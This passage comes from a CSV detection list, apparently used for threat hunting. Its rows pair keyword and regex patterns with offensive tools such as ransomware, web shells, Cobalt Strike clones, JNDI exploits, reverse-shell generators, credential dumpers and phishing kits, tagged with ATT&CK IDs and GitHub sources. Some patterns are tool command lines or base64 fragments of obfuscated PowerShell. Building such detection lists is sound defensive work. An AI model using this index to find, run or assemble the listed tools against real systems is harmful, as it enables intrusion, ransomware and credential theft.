TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.csproj*",".{0,1000}Jasmin\sEncryptor\.csproj.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.exe*",".{0,1000}Jasmin\sEncryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor.sln*",".{0,1000}Jasmin\sEncryptor\.sln.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Encryptor\bin\Release*",".{0,1000}Jasmin\sEncryptor\\bin\\Release.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin Ransomware C2 Checkin*",".{0,1000}Jasmin\sRansomware\sC2\sCheckin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Decryptor.exe*",".{0,1000}Jasmin\%20Decryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Decryptor.pdb*",".{0,1000}Jasmin\%20Decryptor\.pdb.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin%20Encryptor.exe*",".{0,1000}Jasmin\%20Encryptor\.exe.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","1","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin_Decryptor.mainform*",".{0,1000}Jasmin_Decryptor\.mainform.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Jasmin_Decryptor.Properties*",".{0,1000}Jasmin_Decryptor\.Properties.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*'jasminadmin'@'localhost'*",".{0,1000}\'jasminadmin\'\@\'localhost\'.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*jasmin-ransomware-master*",".{0,1000}jasmin\-ransomware\-master.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*jatayu.php*",".{0,1000}jatayu\.php.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*jatayu-image.png*",".{0,1000}jatayu\-image\.png.{0,1000}","offensive_tool_keyword","Jatayu","Stealthy Stand Alone PHP Web Shell","T1071","TA0005","N/A","N/A","Shell spawning","https://github.com/SpiderMate/Jatayu","1","1","N/A","N/A","1","32","9","2019-09-12T17:03:13Z","2019-09-12T09:04:10Z" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*java -jar BeaconTool.jar*",".{0,1000}java\s\-jar\sBeaconTool\.jar.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*java -jar sAINT.jar*",".{0,1000}java\s\-jar\ssAINT\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*java/jndi/LDAPRefServer.java*",".{0,1000}java\/jndi\/LDAPRefServer\.java.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*java/jsp_shell_reverse_tcp*",".{0,1000}java\/jsp_shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*java/shell_reverse_tcp*",".{0,1000}java\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*java-deserialization-exploits*",".{0,1000}java\-deserialization\-exploits.{0,1000}","offensive_tool_keyword","java-deserialization-exploits","A collection of curated Java Deserialization Exploits","T1029 - T1529 - T1569 - T1218","TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research/java-deserialization-exploits","1","0","N/A","N/A","6","587","220","2021-05-16T23:10:49Z","2016-05-31T16:23:08Z" "*javascript-obfuscator*",".{0,1000}javascript\-obfuscator.{0,1000}","offensive_tool_keyword","javascript-obfuscator","JavaScript Obfuscator is a powerful free obfuscator for JavaScript. containing a variety of features which provide protection for your source code.","T1027","TA0010","N/A","N/A","Defense Evasion","https://github.com/javascript-obfuscator/javascript-obfuscator","1","0","N/A","N/A","10","12787","1420","2024-04-21T22:10:06Z","2016-05-09T08:16:53Z" "*jblndlipeogpafnldhgmapagcccfchpi*",".{0,1000}jblndlipeogpafnldhgmapagcccfchpi.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*jboss_jmx_upload_exploit*",".{0,1000}jboss_jmx_upload_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*jdk*-activator-rce-test.txt*",".{0,1000}jdk.{0,1000}\-activator\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-call-rce-test.txt*",".{0,1000}jdk.{0,1000}\-call\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-dgc-rce-test.txt*",".{0,1000}jdk.{0,1000}\-dgc\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-method-rce-test.txt*",".{0,1000}jdk.{0,1000}\-method\-rce\-test\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdk*-reg-bypass.txt*",".{0,1000}jdk.{0,1000}\-reg\-bypass\.txt.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*jdwp-shellifier.py -t * -p * --cmd *",".{0,1000}jdwp\-shellifier\.py\s\-t\s.{0,1000}\s\-p\s.{0,1000}\s\-\-cmd\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*jedisct1*",".{0,1000}jedisct1.{0,1000}","offensive_tool_keyword","Github Username","github username. a knack for cryptography. computer vision. opensource software and infosec. hosting infosec tools used by pentester","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/jedisct1","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*jfjallid/go-secdump*",".{0,1000}jfjallid\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","1","N/A","10","3","279","31","2024-03-17T14:21:34Z","2023-02-23T17:02:50Z" "*JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==*",".{0,1000}JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB*",".{0,1000}JG1lbnUgPSAiIgppZiAoJGZ1bmNpb25lc19wcmV2aWFzLmNvdW50IC1sZSAxKSB.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*JGillam/burp-co2*",".{0,1000}JGillam\/burp\-co2.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl*",".{0,1000}JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGl.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*Jira-Lens.py*",".{0,1000}Jira\-Lens\.py.{0,1000}","offensive_tool_keyword","Jira-Lens","Fast and customizable vulnerability scanner For JIRA written in Python","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/MayankPandey01/Jira-Lens","1","1","N/A","N/A","3","269","38","2024-02-05T10:24:00Z","2021-11-14T18:37:47Z" "*jmarr73/NTLMSleuth*",".{0,1000}jmarr73\/NTLMSleuth.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*jmmcatee/cracklord*",".{0,1000}jmmcatee\/cracklord.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","379","75","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z" "*JMousqueton/PoC-CVE-2022-30190*",".{0,1000}JMousqueton\/PoC\-CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","157","57","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z" "*jmp_hijack_thread(*",".{0,1000}jmp_hijack_thread\(.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*jndi_injection.rb*",".{0,1000}jndi_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*JNDI-Injection-Exploit*",".{0,1000}JNDI\-Injection\-Exploit.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*joaoviictorti/RustRedOps*",".{0,1000}joaoviictorti\/RustRedOps.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*JOB COMPLETE: GO GET YOUR LOOT!*",".{0,1000}JOB\sCOMPLETE\:\sGO\sGET\sYOUR\sLOOT!.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*Job killed and console drained*",".{0,1000}Job\skilled\sand\sconsole\sdrained.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*JoelGMSec/EvilnoVNC*",".{0,1000}JoelGMSec\/EvilnoVNC.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*JoelGMSec/Invoke-Stealth*",".{0,1000}JoelGMSec\/Invoke\-Stealth.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*JoelGMSec/PSRansom*",".{0,1000}JoelGMSec\/PSRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "*Joey is the best hacker in Hackers*",".{0,1000}Joey\sis\sthe\sbest\shacker\sin\sHackers.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*john * --incremental*",".{0,1000}john\s.{0,1000}\s\-\-incremental.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john * -w=*",".{0,1000}john\s.{0,1000}\s\-w\=.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john * --wordlist=*",".{0,1000}john\s.{0,1000}\s\-\-wordlist\=.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-groups*",".{0,1000}john\s.{0,1000}\-groups.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *htdigest*",".{0,1000}john\s.{0,1000}htdigest.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*john *-inc *",".{0,1000}john\s.{0,1000}\-inc\s.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 